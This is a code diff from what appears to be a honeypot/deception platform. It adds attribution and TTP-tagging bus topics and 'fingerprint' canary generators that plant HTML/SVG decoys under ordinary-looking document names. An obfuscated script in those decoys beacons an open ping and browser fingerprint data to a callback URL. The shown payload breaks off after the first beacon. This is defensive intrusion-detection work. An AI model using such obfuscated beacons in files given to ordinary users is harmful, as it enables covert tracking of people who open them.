||||||
from decnet.telemetry import wrap_repository # type: ignore[attr-defined]
|
from decnet.telemetry import wrap_repository
|
||||||
except ImportError:
|
except ImportError:
|
||||||
return bus
|
return bus
|
||||||
try:
|
try:
|
||||||
|
|||||||
@@ -58,7 +58,7 @@ def make_thread_safe_publisher(
|
|||||||
contract the rest of this module already upholds.
|
contract the rest of this module already upholds.
|
||||||
"""
|
"""
|
||||||
if bus is None:
|
if bus is None:
|
||||||
return lambda _topic, _payload, _event_type="": None
|
return lambda _topic, _payload, _event_type="": None # type: ignore[misc]
|
||||||
|
|
||||||
def _publish(topic: str, payload: dict[str, Any], event_type: str = "") -> None:
|
def _publish(topic: str, payload: dict[str, Any], event_type: str = "") -> None:
|
||||||
# Stream threads may keep draining after the bus owner closed it
|
# Stream threads may keep draining after the bus owner closed it
|
||||||
|
|||||||
@@ -17,6 +17,7 @@ Token structure (NATS-style, dot-separated):
|
|||||||
attacker.scored
|
attacker.scored
|
||||||
attacker.session.started
|
attacker.session.started
|
||||||
attacker.session.ended
|
attacker.session.ended
|
||||||
|
attacker.observation.{primitive}
|
||||||
identity.formed
|
identity.formed
|
||||||
identity.observation.linked
|
identity.observation.linked
|
||||||
identity.merged
|
identity.merged
|
||||||
@@ -28,12 +29,18 @@ Token structure (NATS-style, dot-separated):
|
|||||||
campaign.unmerged
|
campaign.unmerged
|
||||||
credential.captured
|
credential.captured
|
||||||
credential.reuse.detected
|
credential.reuse.detected
|
||||||
|
attribution.profile.state_changed
|
||||||
|
attribution.profile.multi_actor_suspected
|
||||||
canary.{token_id}.triggered
|
canary.{token_id}.triggered
|
||||||
canary.{token_id}.placed
|
canary.{token_id}.placed
|
||||||
canary.{token_id}.revoked
|
canary.{token_id}.revoked
|
||||||
system.log
|
system.log
|
||||||
system.bus.health
|
system.bus.health
|
||||||
system.{worker}.health
|
system.{worker}.health
|
||||||
|
email.received
|
||||||
|
ttp.tagged
|
||||||
|
ttp.rule.fired.{technique_id}
|
||||||
|
ttp.rule.suppressed
|
||||||
|
|
||||||
Wildcards (per :func:`decnet.bus.base.matches`):
|
Wildcards (per :func:`decnet.bus.base.matches`):
|
||||||
|
|
||||||
@@ -52,8 +59,12 @@ IDENTITY = "identity"
|
|||||||
CAMPAIGN = "campaign"
|
CAMPAIGN = "campaign"
|
||||||
SYSTEM = "system"
|
SYSTEM = "system"
|
||||||
CREDENTIAL = "credential"
|
CREDENTIAL = "credential"
|
||||||
|
ATTRIBUTION = "attribution"
|
||||||
ORCHESTRATOR = "orchestrator"
|
ORCHESTRATOR = "orchestrator"
|
||||||
CANARY = "canary"
|
CANARY = "canary"
|
||||||
|
SMTP = "smtp"
|
||||||
|
EMAIL = "email"
|
||||||
|
TTP = "ttp"
|
||||||
|
|
||||||
|
|
||||||
# ─── Leaf event-type constants (the last segment of each topic) ──────────────
|
# ─── Leaf event-type constants (the last segment of each topic) ──────────────
|
||||||
@@ -83,6 +94,19 @@ DECKY_MUTATE_REQUEST = "mutate_request"
|
|||||||
# syslog sidechannel too) to interleave substrate-change markers into
|
# syslog sidechannel too) to interleave substrate-change markers into
|
||||||
# attacker traversals.
|
# attacker traversals.
|
||||||
DECKY_MUTATION = "mutation"
|
DECKY_MUTATION = "mutation"
|
||||||
|
# Per-service add/remove on a deployed decky (live; no full redeploy).
|
||||||
|
# Payload carries ``decky_name``, ``service_name``, optional
|
||||||
|
# ``topology_id``, and ``services`` (the post-mutation list). Consumers
|
||||||
|
# that watch substrate shape (correlator, dashboard, profiler) reconcile
|
||||||
|
# off these without waiting for the next decnet-state.json snapshot.
|
||||||
|
DECKY_SERVICE_ADDED = "service_added"
|
||||||
|
DECKY_SERVICE_REMOVED = "service_removed"
|
||||||
|
# Per-service config change (the schema-driven Inspector form). Payload
|
||||||
|
# carries ``decky_name``, ``service_name``, optional ``topology_id``,
|
||||||
|
# ``service_config`` (the new validated dict), and ``recreated`` — true
|
||||||
|
# when the operator hit Apply (container was force-recreated to pick up
|
||||||
|
# the new env), false when they only hit Save (DB-only).
|
||||||
|
DECKY_SERVICE_CONFIG_CHANGED = "service_config_changed"
|
||||||
|
|
||||||
# Attacker event types (second token under the ``attacker`` root). First
|
# Attacker event types (second token under the ``attacker`` root). First
|
||||||
# sighting, session boundary transitions, and score-threshold crossings
|
# sighting, session boundary transitions, and score-threshold crossings
|
||||||
@@ -94,6 +118,14 @@ ATTACKER_SCORED = "scored"
|
|||||||
# Distinct from ``observed`` which is the correlator's first-sight signal —
|
# Distinct from ``observed`` which is the correlator's first-sight signal —
|
||||||
# a fingerprint is additional evidence about an already-observed attacker.
|
# a fingerprint is additional evidence about an already-observed attacker.
|
||||||
ATTACKER_FINGERPRINTED = "fingerprinted"
|
ATTACKER_FINGERPRINTED = "fingerprinted"
|
||||||
|
# Published when the prober observes a NEW hash for an
|
||||||
|
# (attacker_ip, port, probe_type) triple it has seen before — i.e. the
|
||||||
|
# attacker rotated their VPS, rebuilt their SSH server, swapped their
|
||||||
|
# TLS cert. Distinct from ``fingerprinted`` which fires on every probe
|
||||||
|
# result; ``fingerprint_rotated`` fires only on diff and carries both
|
||||||
|
# old_hash + new_hash. Producer: prober (via the rotation library);
|
||||||
|
# consumers: dashboard, forensics, attribution clustering.
|
||||||
|
ATTACKER_FINGERPRINT_ROTATED = "fingerprint_rotated"
|
||||||
ATTACKER_SESSION_STARTED = "session.started"
|
ATTACKER_SESSION_STARTED = "session.started"
|
||||||
ATTACKER_SESSION_ENDED = "session.ended"
|
ATTACKER_SESSION_ENDED = "session.ended"
|
||||||
# Published by the ``decnet enrich`` worker after an enrichment pass
|
# Published by the ``decnet enrich`` worker after an enrichment pass
|
||||||
@@ -101,6 +133,19 @@ ATTACKER_SESSION_ENDED = "session.ended"
|
|||||||
# returned a verdict). Payload carries the aggregate verdict + per-
|
# returned a verdict). Payload carries the aggregate verdict + per-
|
||||||
# provider summary so SIEM-bound webhooks don't need to re-query the DB.
|
# provider summary so SIEM-bound webhooks don't need to re-query the DB.
|
||||||
ATTACKER_INTEL_ENRICHED = "intel.enriched"
|
ATTACKER_INTEL_ENRICHED = "intel.enriched"
|
||||||
|
# Per-primitive BEHAVE-SHELL observation. Full topic shape:
|
||||||
|
# attacker.observation.<primitive>
|
||||||
|
# e.g. ``attacker.observation.motor.input_modality``. Producer:
|
||||||
|
# ``decnet/profiler/behave_shell/`` (extractor library called from the
|
||||||
|
# profiler worker on ``attacker.session.ended``); consumers: dashboard
|
||||||
|
# SSE relay, attribution engine state machine, federation gossip
|
||||||
|
# (post-v0). See development/BEHAVE-INTEGRATION.md §"Bus topics" for
|
||||||
|
# the wire-format contract — the prefix is documentation + pattern
|
||||||
|
# match only; bus auth is socket file perms (DEBT-029 §2), not
|
||||||
|
# topic-level. The ``primitive`` segment MAY contain dots
|
||||||
|
# (``motor.shell_mastery.tab_completion``) — the same dotted-leaf
|
||||||
|
# rule that ``attacker.session.ended`` uses.
|
||||||
|
ATTACKER_OBSERVATION_PREFIX = "observation"
|
||||||
|
|
||||||
# Identity-resolution event types (second/third tokens under ``identity``).
|
# Identity-resolution event types (second/third tokens under ``identity``).
|
||||||
# Published by the (future) clusterer worker — see
|
# Published by the (future) clusterer worker — see
|
||||||
@@ -168,6 +213,42 @@ CAMPAIGN_UNMERGED = "unmerged"
|
|||||||
CREDENTIAL_CAPTURED = "captured"
|
CREDENTIAL_CAPTURED = "captured"
|
||||||
CREDENTIAL_REUSE_DETECTED = "reuse.detected"
|
CREDENTIAL_REUSE_DETECTED = "reuse.detected"
|
||||||
|
|
||||||
|
# Attribution-engine event types (second/third tokens under
|
||||||
|
# ``attribution``). Published by the v0 attribution worker
|
||||||
|
# (``decnet.correlation.attribution_worker``) which subscribes to
|
||||||
|
# ``attacker.observation.>`` and runs the per-(identity, primitive)
|
||||||
|
# state machine. See ``development/ATTRIBUTION-ENGINE.md``.
|
||||||
|
#
|
||||||
|
# attribution.profile.state_changed — per-primitive state
|
||||||
|
# transition (e.g.
|
||||||
|
# stable → drifting).
|
||||||
|
# Payload: identity_uuid,
|
||||||
|
# primitive, old_state,
|
||||||
|
# new_state, current_value,
|
||||||
|
# confidence,
|
||||||
|
# observation_count, ts.
|
||||||
|
# attribution.profile.multi_actor_suspected — fires when ≥ 2
|
||||||
|
# primitives flag the same
|
||||||
|
# identity as multi_actor
|
||||||
|
# concurrently. Cross-
|
||||||
|
# primitive correlator;
|
||||||
|
# single-primitive
|
||||||
|
# multi_actor is too noisy
|
||||||
|
# on its own. Payload:
|
||||||
|
# identity_uuid, primitives,
|
||||||
|
# evidence_summary,
|
||||||
|
# confidence, ts.
|
||||||
|
#
|
||||||
|
# These are *derived* signals — distinct from
|
||||||
|
# ``identity.*`` (clusterer lifecycle, IDENTITY_RESOLUTION.md) and
|
||||||
|
# ``attacker.observation.*`` (raw extractor envelopes,
|
||||||
|
# BEHAVE-INTEGRATION.md). The three families compose: observations feed
|
||||||
|
# the attribution engine, the engine emits derived state, the clusterer
|
||||||
|
# reads observations + state to form / merge identities.
|
||||||
|
ATTRIBUTION_PROFILE_PREFIX = "profile"
|
||||||
|
ATTRIBUTION_PROFILE_STATE_CHANGED = "profile.state_changed"
|
||||||
|
ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED = "profile.multi_actor_suspected"
|
||||||
|
|
||||||
# Canary-token event types (third token under ``canary``).
|
# Canary-token event types (third token under ``canary``).
|
||||||
#
|
#
|
||||||
# canary.{token_id}.placed — orchestrator/API successfully planted a
|
# canary.{token_id}.placed — orchestrator/API successfully planted a
|
||||||
@@ -231,6 +312,43 @@ WORKER_CONTROL_START = "start"
|
|||||||
# of patterns. Payload is currently empty; consumers only need the signal.
|
# of patterns. Payload is currently empty; consumers only need the signal.
|
||||||
WEBHOOK_SUBSCRIPTIONS_CHANGED = "system.webhook.subscriptions_changed"
|
WEBHOOK_SUBSCRIPTIONS_CHANGED = "system.webhook.subscriptions_changed"
|
||||||
|
|
||||||
|
# Email-receipt event — fired by smtp / smtp-relay services on full-message
|
||||||
|
# receipt (envelope + headers + body + attachments captured). Single-token
|
||||||
|
# leaf so the bus tokenizer accepts it directly under the ``email`` root.
|
||||||
|
# Consumed by the TTP ``email_lifter`` for header / body-pattern / attachment
|
||||||
|
# rules. PII rule (TTP_TAGGING.md "Hard parts §6"): payload carries hashes,
|
||||||
|
# counts, header names, and rcpt-domain sets — never rcpt addresses or body
|
||||||
|
# bytes.
|
||||||
|
EMAIL_RECEIVED = "received"
|
||||||
|
|
||||||
|
# TTP-tagging event types (second/third tokens under ``ttp``).
|
||||||
|
#
|
||||||
|
# ttp.tagged — one or more new tags written. Published
|
||||||
|
# only when ``INSERT OR IGNORE`` wrote at
|
||||||
|
# least one new row; idempotent
|
||||||
|
# re-evaluations publish nothing
|
||||||
|
# (loop-prevention invariant — see
|
||||||
|
# TTP_TAGGING.md).
|
||||||
|
# ttp.rule.fired.{technique_id} — per-technique fan-out for SIEM
|
||||||
|
# consumers that subscribe to a single
|
||||||
|
# technique. Topic key is the parent
|
||||||
|
# technique; sub_technique is in the
|
||||||
|
# payload. Built via :func:`ttp_rule_fired`.
|
||||||
|
# ttp.rule.suppressed — rule fired but the tag was dropped
|
||||||
|
# (confidence below floor, rate-limited,
|
||||||
|
# or the rule's RuleState was disabled).
|
||||||
|
# Observability signal for the dashboard.
|
||||||
|
#
|
||||||
|
# Per-rule reload + state-change topics. Built via
|
||||||
|
# :func:`ttp_rule_reloaded` / :func:`ttp_rule_state`; SIEM consumers
|
||||||
|
# subscribe to ``ttp.rule.reloaded.>`` (every rule) or
|
||||||
|
# ``ttp.rule.reloaded.R0001`` (one rule) at their preferred granularity.
|
||||||
|
TTP_TAGGED = "tagged"
|
||||||
|
TTP_RULE_FIRED = "rule.fired"
|
||||||
|
TTP_RULE_SUPPRESSED = "rule.suppressed"
|
||||||
|
TTP_RULE_RELOADED = "rule.reloaded"
|
||||||
|
TTP_RULE_STATE = "rule.state"
|
||||||
|
|
||||||
|
|
||||||
# ─── Builders ────────────────────────────────────────────────────────────────
|
# ─── Builders ────────────────────────────────────────────────────────────────
|
||||||
|
|
||||||
@@ -301,6 +419,42 @@ def attacker(event_type: str) -> str:
|
|||||||
return f"{ATTACKER}.{event_type}"
|
return f"{ATTACKER}.{event_type}"
|
||||||
|
|
||||||
|
|
||||||
|
def attacker_observation(primitive: str) -> str:
    """Return the bus topic ``attacker.observation.<primitive>``.

    *primitive* is the fully-qualified BEHAVE-SHELL primitive path, for
    example ``motor.input_modality``,
    ``cognitive.feedback_loop_engagement`` or
    ``motor.shell_mastery.tab_completion``. Dots inside *primitive* are
    allowed: that is the shape
    ``behave_shell.spec.event_adapter.event_topic_for`` emits upstream,
    and DECNET's bus admits a dotted leaf here the same way
    :func:`attacker` does for ``session.started``.

    Raises:
        ValueError: if *primitive* is empty, so that a downstream typo
            cannot ship as ``attacker.observation.``.
    """
    if primitive:
        return f"{ATTACKER}.{ATTACKER_OBSERVATION_PREFIX}.{primitive}"
    raise ValueError(
        "attacker_observation topic requires a non-empty primitive",
    )
|
||||||
|
|
||||||
|
|
||||||
|
def attribution(event_type: str) -> str:
    """Return the bus topic ``attribution.<event_type>``.

    *event_type* is usually
    :data:`ATTRIBUTION_PROFILE_STATE_CHANGED` or
    :data:`ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED`. Both contain a dot
    (``profile.state_changed``); that is allowed under the same
    "trailing dotted leaf" rule ``attacker.session.started`` relies on.

    Raises:
        ValueError: if *event_type* is empty.
    """
    if event_type:
        return f"{ATTRIBUTION}.{event_type}"
    raise ValueError("attribution topic requires a non-empty event_type")
|
||||||
|
|
||||||
|
|
||||||
def campaign(event_type: str) -> str:
|
def campaign(event_type: str) -> str:
|
||||||
"""Build ``campaign.<event_type>``.
|
"""Build ``campaign.<event_type>``.
|
||||||
|
|
||||||
@@ -381,6 +535,86 @@ def system_control(worker: str) -> str:
|
|||||||
return f"{SYSTEM}.{worker}.{SYSTEM_CONTROL}"
|
return f"{SYSTEM}.{worker}.{SYSTEM_CONTROL}"
|
||||||
|
|
||||||
|
|
||||||
|
def smtp(event_type: str) -> str:
    """Return the bus topic ``smtp.<event_type>``.

    Dots are allowed inside *event_type* (for example ``probe.pending``).

    Raises:
        ValueError: if *event_type* is empty.
    """
    if event_type:
        return f"{SMTP}.{event_type}"
    raise ValueError("smtp topic requires a non-empty event_type")
|
||||||
|
|
||||||
|
|
||||||
|
def email_topic(event_type: str) -> str:
    """Return the bus topic ``email.<event_type>``.

    The builder is called ``email_topic`` instead of ``email`` so that it
    does not shadow the Python ``email`` stdlib package at import sites
    that pull in both. *event_type* is usually :data:`EMAIL_RECEIVED`.

    Raises:
        ValueError: if *event_type* is empty.
    """
    if event_type:
        return f"{EMAIL}.{event_type}"
    raise ValueError("email topic requires a non-empty event_type")
|
||||||
|
|
||||||
|
|
||||||
|
def ttp(event_type: str) -> str:
    """Return the bus topic ``ttp.<event_type>``.

    *event_type* is usually :data:`TTP_TAGGED`, :data:`TTP_RULE_FIRED`
    or :data:`TTP_RULE_SUPPRESSED`. Dotted leaves such as ``rule.fired``
    are allowed, for the same reason they are in :func:`system`. Use
    :func:`ttp_rule_fired` when a per-technique fan-out topic is needed.

    Raises:
        ValueError: if *event_type* is empty.
    """
    if event_type:
        return f"{TTP}.{event_type}"
    raise ValueError("ttp topic requires a non-empty event_type")
|
||||||
|
|
||||||
|
|
||||||
|
def ttp_rule_fired(technique_id: str) -> str:
    """Build ``ttp.rule.fired.<technique_id>``.

    Per-technique fan-out: SIEM subscribers can listen on
    ``ttp.rule.fired.>`` for everything, or ``ttp.rule.fired.T1110`` for
    one technique. *technique_id* is validated as a single segment via
    :func:`_reject_tokens` — sub-techniques like ``T1110.001`` are
    rejected because they would split into two tokens. The topic key is
    the parent technique; ``sub_technique_id`` lives in the payload.
    """
    _reject_tokens(technique_id)
    # Build from the shared constant, like ttp_rule_reloaded and
    # ttp_rule_state do, so the "rule.fired" leaf has one definition.
    return f"{TTP}.{TTP_RULE_FIRED}.{technique_id}"
|
||||||
|
|
||||||
|
|
||||||
|
def ttp_rule_reloaded(rule_id: str) -> str:
    """Return the bus topic ``ttp.rule.reloaded.<rule_id>``.

    This is the per-rule fan-out topic the
    :class:`~decnet.ttp.store.base.RuleStore` fires when a rule's
    *definition* changes: a YAML edit on the filesystem backend, or a
    ``ttp_rule`` row update on the database backend. Each per-rule edit
    produces one event and edits are never batched; the "incremental,
    never batched" property in TTP_TAGGING.md §"Bus topics" takes its
    granularity from :meth:`RuleStore.subscribe_changes`.

    Subscribe to ``ttp.rule.reloaded.>`` for every rule or to
    ``ttp.rule.reloaded.R0001`` for a single one. *rule_id* is validated
    as a single segment before the topic is built.
    """
    _reject_tokens(rule_id)
    topic = f"{TTP}.{TTP_RULE_RELOADED}.{rule_id}"
    return topic
|
||||||
|
|
||||||
|
|
||||||
|
def ttp_rule_state(rule_id: str) -> str:
    """Return the bus topic ``ttp.rule.state.<rule_id>``.

    This is the per-rule fan-out topic the
    :class:`~decnet.ttp.store.base.RuleStore` fires when a rule's
    *operational state* changes, e.g. an operator hits the disable
    button, or an ``expires_at`` TTL fires and auto-reverts the state.
    *rule_id* is validated as a single segment before the topic is built.
    """
    _reject_tokens(rule_id)
    topic = f"{TTP}.{TTP_RULE_STATE}.{rule_id}"
    return topic
|
||||||
|
|
||||||
|
|
||||||
def _reject_tokens(*parts: str) -> None:
|
def _reject_tokens(*parts: str) -> None:
|
||||||
"""Reject topic segments that would break NATS-style tokenization.
|
"""Reject topic segments that would break NATS-style tokenization.
|
||||||
|
|
||||||
|
|||||||
18
decnet/canary/_obfuscate_helper.js
Normal file
18
decnet/canary/_obfuscate_helper.js
Normal file
@@ -0,0 +1,18 @@
|
|||||||
|
// Node helper invoked by decnet.canary.obfuscator.
|
||||||
|
// Reads {code, options} JSON from stdin, writes obfuscated JS to stdout.
|
||||||
|
// Kept dependency-light on purpose: only javascript-obfuscator.
|
||||||
|
const JsObf = require('javascript-obfuscator');
|
||||||
|
|
||||||
|
// stdin delivers the JSON request in arbitrary chunks, so buffer all of it
// and only parse once the stream has ended.
let raw = '';
process.stdin.setEncoding('utf8');
process.stdin.on('data', (chunk) => { raw += chunk; });
process.stdin.on('end', () => {
  try {
    const { code, options } = JSON.parse(raw);
    const result = JsObf.obfuscate(code, options || {});
    process.stdout.write(result.getObfuscatedCode());
  } catch (e) {
    // Report the failure (stack when available) on stderr for the caller.
    process.stderr.write(String(e && e.stack || e));
    // Set the exit status rather than calling process.exit(): exit() ends
    // the process immediately and can drop stderr output that has not been
    // flushed yet. With exitCode the process ends on its own, exactly as it
    // already does on the success path, and still reports status 2.
    process.exitCode = 2;
  }
});
|
||||||
@@ -100,6 +100,12 @@ class CanaryArtifact:
|
|||||||
planting. Never leaked to the attacker-facing surface.
|
planting. Never leaked to the attacker-facing surface.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
fingerprint_nonce: Optional[str] = None
|
||||||
|
"""Per-mint HMAC nonce for fingerprint canaries; ``None`` for everything
|
||||||
|
else. Cultivator reads this and persists it on ``CanaryToken.fingerprint_nonce``
|
||||||
|
so the worker can validate incoming ``?k=`` params.
|
||||||
|
"""
|
||||||
|
|
||||||
|
|
||||||
class CanaryGenerator(ABC):
|
class CanaryGenerator(ABC):
|
||||||
"""Produces a fake artifact from scratch."""
|
"""Produces a fake artifact from scratch."""
|
||||||
|
|||||||
@@ -46,6 +46,8 @@ _CLASS_TO_GENERATOR: dict[ContentClass, str] = {
|
|||||||
ContentClass.CANARY_HONEYDOC_DOCX: "honeydoc_docx",
|
ContentClass.CANARY_HONEYDOC_DOCX: "honeydoc_docx",
|
||||||
ContentClass.CANARY_HONEYDOC_PDF: "honeydoc_pdf",
|
ContentClass.CANARY_HONEYDOC_PDF: "honeydoc_pdf",
|
||||||
ContentClass.CANARY_MYSQL_DUMP: "mysql_dump",
|
ContentClass.CANARY_MYSQL_DUMP: "mysql_dump",
|
||||||
|
ContentClass.CANARY_FINGERPRINT_HTML: "fingerprint_html",
|
||||||
|
ContentClass.CANARY_FINGERPRINT_SVG: "fingerprint_svg",
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
@@ -62,6 +64,8 @@ _GENERATOR_TO_KIND: dict[str, str] = {
|
|||||||
"honeydoc_pdf": "http",
|
"honeydoc_pdf": "http",
|
||||||
"ssh_key": "dns", # trip is DNS resolution of host comment
|
"ssh_key": "dns", # trip is DNS resolution of host comment
|
||||||
"mysql_dump": "dns", # trip is DNS resolution of subdomain
|
"mysql_dump": "dns", # trip is DNS resolution of subdomain
|
||||||
|
"fingerprint_html": "http", # obfuscated JS beacons GET /c/<slug>
|
||||||
|
"fingerprint_svg": "http", # same, embedded inside SVG <script>
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
@@ -78,6 +82,8 @@ _DEFAULT_PATH: dict[ContentClass, str] = {
|
|||||||
ContentClass.CANARY_HONEYDOC_DOCX: "/home/{persona}/Documents/Q3-Operations-Review.docx",
|
ContentClass.CANARY_HONEYDOC_DOCX: "/home/{persona}/Documents/Q3-Operations-Review.docx",
|
||||||
ContentClass.CANARY_HONEYDOC_PDF: "/home/{persona}/Documents/Q3-Operations-Review.pdf",
|
ContentClass.CANARY_HONEYDOC_PDF: "/home/{persona}/Documents/Q3-Operations-Review.pdf",
|
||||||
ContentClass.CANARY_MYSQL_DUMP: "/var/backups/db_backup.sql",
|
ContentClass.CANARY_MYSQL_DUMP: "/var/backups/db_backup.sql",
|
||||||
|
ContentClass.CANARY_FINGERPRINT_HTML: "/home/{persona}/Documents/asset_directory.html",
|
||||||
|
ContentClass.CANARY_FINGERPRINT_SVG: "/home/{persona}/Documents/network_topology.svg",
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
@@ -136,10 +142,12 @@ async def cultivate(
|
|||||||
)
|
)
|
||||||
|
|
||||||
callback_token = _new_callback_token()
|
callback_token = _new_callback_token()
|
||||||
|
http_base_str: str = http_base or os.environ.get("DECNET_CANARY_HTTP_BASE") or ""
|
||||||
|
dns_zone_str: str = dns_zone or os.environ.get("DECNET_CANARY_DNS_ZONE") or ""
|
||||||
ctx = CanaryContext(
|
ctx = CanaryContext(
|
||||||
callback_token=callback_token,
|
callback_token=callback_token,
|
||||||
http_base=http_base or os.environ.get("DECNET_CANARY_HTTP_BASE", ""),
|
http_base=http_base_str,
|
||||||
dns_zone=dns_zone or os.environ.get("DECNET_CANARY_DNS_ZONE", ""),
|
dns_zone=dns_zone_str,
|
||||||
persona="linux", # all our deckies are POSIX in MVP
|
persona="linux", # all our deckies are POSIX in MVP
|
||||||
)
|
)
|
||||||
generator = get_generator(gen_name)
|
generator = get_generator(gen_name)
|
||||||
@@ -154,7 +162,7 @@ async def cultivate(
|
|||||||
# attribute a callback if the artifact trips during the plant
|
# attribute a callback if the artifact trips during the plant
|
||||||
# itself (improbable but possible — DOCX viewers can preview
|
# itself (improbable but possible — DOCX viewers can preview
|
||||||
# autoplay-style).
|
# autoplay-style).
|
||||||
await repo.create_canary_token({
|
token_data: dict = {
|
||||||
"kind": _GENERATOR_TO_KIND.get(gen_name, "http"),
|
"kind": _GENERATOR_TO_KIND.get(gen_name, "http"),
|
||||||
"decky_name": plan.decky_name,
|
"decky_name": plan.decky_name,
|
||||||
"instrumenter": None,
|
"instrumenter": None,
|
||||||
@@ -165,7 +173,10 @@ async def cultivate(
|
|||||||
"placed_at": datetime.now(timezone.utc),
|
"placed_at": datetime.now(timezone.utc),
|
||||||
"created_by": created_by,
|
"created_by": created_by,
|
||||||
"state": "planted",
|
"state": "planted",
|
||||||
})
|
}
|
||||||
|
if artifact.fingerprint_nonce is not None:
|
||||||
|
token_data["fingerprint_nonce"] = artifact.fingerprint_nonce
|
||||||
|
await repo.create_canary_token(token_data)
|
||||||
|
|
||||||
# Carry the placement_path on the artifact so the orchestrator's
|
# Carry the placement_path on the artifact so the orchestrator's
|
||||||
# plant_file call uses it. We don't mutate the generator's
|
# plant_file call uses it. We don't mutate the generator's
|
||||||
|
|||||||
@@ -131,7 +131,7 @@ def _build_response(
|
|||||||
question = qname_bytes + struct.pack("!HH", query.qtype, query.qclass)
|
question = qname_bytes + struct.pack("!HH", query.qtype, query.qclass)
|
||||||
|
|
||||||
answer = b""
|
answer = b""
|
||||||
if an_count:
|
if an_count and answer_ip is not None:
|
||||||
# Use a name pointer back to the question (offset 12).
|
# Use a name pointer back to the question (offset 12).
|
||||||
ptr = struct.pack("!H", 0xC000 | 12)
|
ptr = struct.pack("!H", 0xC000 | 12)
|
||||||
rdata = bytes(int(o) for o in answer_ip.split("."))
|
rdata = bytes(int(o) for o in answer_ip.split("."))
|
||||||
@@ -169,10 +169,10 @@ class CanaryDNSProtocol(asyncio.DatagramProtocol):
|
|||||||
self._answer_ip = answer_ip
|
self._answer_ip = answer_ip
|
||||||
self._transport: Optional[asyncio.DatagramTransport] = None
|
self._transport: Optional[asyncio.DatagramTransport] = None
|
||||||
|
|
||||||
def connection_made(self, transport) -> None: # type: ignore[override]
|
def connection_made(self, transport) -> None:
|
||||||
self._transport = transport # type: ignore[assignment]
|
self._transport = transport
|
||||||
|
|
||||||
def datagram_received( # type: ignore[override]
|
def datagram_received(
|
||||||
self, data: bytes, addr: Tuple[str, int],
|
self, data: bytes, addr: Tuple[str, int],
|
||||||
) -> None:
|
) -> None:
|
||||||
try:
|
try:
|
||||||
@@ -190,7 +190,7 @@ class CanaryDNSProtocol(asyncio.DatagramProtocol):
|
|||||||
return
|
return
|
||||||
# Known name — answer with our sinkhole IP, then fire the hook.
|
# Known name — answer with our sinkhole IP, then fire the hook.
|
||||||
self._send(addr, _build_response(query, answer_ip=self._answer_ip))
|
self._send(addr, _build_response(query, answer_ip=self._answer_ip))
|
||||||
asyncio.create_task(self._hook(slug, query, addr[0]))
|
asyncio.ensure_future(self._hook(slug, query, addr[0]))
|
||||||
|
|
||||||
def _slug_for(self, qname: str) -> Optional[str]:
|
def _slug_for(self, qname: str) -> Optional[str]:
|
||||||
if not self._zone or not qname.endswith(self._suffix):
|
if not self._zone or not qname.endswith(self._suffix):
|
||||||
|
|||||||
@@ -21,6 +21,8 @@ KNOWN_GENERATORS: Tuple[str, ...] = (
|
|||||||
"honeydoc_docx",
|
"honeydoc_docx",
|
||||||
"honeydoc_pdf",
|
"honeydoc_pdf",
|
||||||
"mysql_dump",
|
"mysql_dump",
|
||||||
|
"fingerprint_html",
|
||||||
|
"fingerprint_svg",
|
||||||
)
|
)
|
||||||
|
|
||||||
KNOWN_INSTRUMENTERS: Tuple[str, ...] = (
|
KNOWN_INSTRUMENTERS: Tuple[str, ...] = (
|
||||||
@@ -64,6 +66,16 @@ def get_generator(name: str) -> CanaryGenerator:
|
|||||||
if name == "mysql_dump":
|
if name == "mysql_dump":
|
||||||
from decnet.canary.generators.mysql_dump import MySQLDumpGenerator
|
from decnet.canary.generators.mysql_dump import MySQLDumpGenerator
|
||||||
return MySQLDumpGenerator()
|
return MySQLDumpGenerator()
|
||||||
|
if name == "fingerprint_html":
|
||||||
|
from decnet.canary.generators.fingerprint_html import (
|
||||||
|
FingerprintHtmlGenerator,
|
||||||
|
)
|
||||||
|
return FingerprintHtmlGenerator()
|
||||||
|
if name == "fingerprint_svg":
|
||||||
|
from decnet.canary.generators.fingerprint_svg import (
|
||||||
|
FingerprintSvgGenerator,
|
||||||
|
)
|
||||||
|
return FingerprintSvgGenerator()
|
||||||
raise ValueError(
|
raise ValueError(
|
||||||
f"Unknown canary generator: {name!r}. Known: {KNOWN_GENERATORS}"
|
f"Unknown canary generator: {name!r}. Known: {KNOWN_GENERATORS}"
|
||||||
)
|
)
|
||||||
|
|||||||
291
decnet/canary/fingerprint_payload.js
Normal file
291
decnet/canary/fingerprint_payload.js
Normal file
@@ -0,0 +1,291 @@
|
|||||||
|
// Canary fingerprint payload — the JS that runs inside an opened HTML/SVG
|
||||||
|
// canary, harvests browser primitives, and beacons the result back to the
|
||||||
|
// canary worker. Ported from canary-self-test.html with the rendering UI
|
||||||
|
// stripped out.
|
||||||
|
//
|
||||||
|
// Three placeholders are substituted by the Python builder BEFORE
|
||||||
|
// javascript-obfuscator runs:
|
||||||
|
//
|
||||||
|
// {{BEACON_URL}} → full URL to /c/<callback_token> (no trailing slash)
|
||||||
|
// {{MINT_UUID}} → per-mint UUID, baked into the string-array post-obf
|
||||||
|
// {{MINT_NONCE}} → 16-hex HMAC nonce; the worker rejects ?d=/?o= without it
|
||||||
|
//
|
||||||
|
// Beacon strategy (MVP): a bare GET pixel for "I was opened" reliability,
|
||||||
|
// then a fingerprint payload sent as a base64-URL query param on a second
|
||||||
|
// GET so the existing worker records the hit even before step-4 POST
|
||||||
|
// support lands. Both fail-open: any error short-circuits to next step.
|
||||||
|
|
||||||
|
(async function () {
  // The three "{{...}}" strings are placeholders; per the file header they
  // are substituted by the Python builder before obfuscation.
  var BEACON_URL = "{{BEACON_URL}}";
  var MINT_UUID = "{{MINT_UUID}}";
  var MINT_NONCE = "{{MINT_NONCE}}";
  // Result object; every probe below stores either its values or
  // { err: ... } under a short key so one failing probe never stops the rest.
  var fp = { mint: MINT_UUID };

  // Fire-and-forget GET: assigning Image.src triggers the request. Errors
  // are swallowed on purpose (fail-open).
  function fire(url) {
    try {
      var img = new Image();
      img.src = url;
    } catch (e) { /* swallow */ }
  }

  // 1) bare-open beacon — fires regardless of whether the rest succeeds
  fire(BEACON_URL + "?o=1&k=" + MINT_NONCE);

  // Resolve to the lowercase hex SHA-256 of the UTF-8 encoding of str.
  function sha256(str) {
    var buf = new TextEncoder().encode(str);
    return crypto.subtle.digest("SHA-256", buf).then(function (h) {
